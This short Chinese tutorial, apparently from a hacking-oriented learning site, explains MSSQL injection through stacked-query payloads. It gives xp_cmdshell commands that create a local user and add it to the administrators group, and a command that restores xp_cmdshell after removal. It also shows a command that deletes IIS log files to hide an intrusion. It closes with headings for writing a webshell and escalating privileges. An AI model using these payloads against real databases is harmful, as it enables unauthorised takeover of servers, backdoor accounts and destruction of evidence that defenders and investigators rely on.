欢迎大家来到爱国者安全网学习，大家好，我是蔷薇。

主题：MSSQL注入工具的原理实现

内容：

MSSQL还有许多扩展功能。

1.最常用的数据库的扩展存储过程：exec master..xp_cmdshell
利用它我们可以快速得到一个shell
;exec master..xp_cmdshell 'dir c:\'
;exec master..xp_cmdshell 'net user 123 123/add'
;exec master..xp_cmdshell 'net localgroup administrators 123/add'

如果这个扩展存储不存在我们可以恢复它，用
;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'

我们还可以用xp_cmdshell做其他事情。

;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070301.log >c:\temp.txt'

2.在 MSSQL2000中提供了一个函数用来访问一个叫OLE的对象，通过它可以访问OLE控件，间接的使我们得到一个shell，所用到函数是sp_OACreate和sp_OAMethod

语句我就不写了，没必要去了解，大家知道了这些就可以了。我们通常是用工具的。

3.列目录

4.写入webshell

5.沙盒提权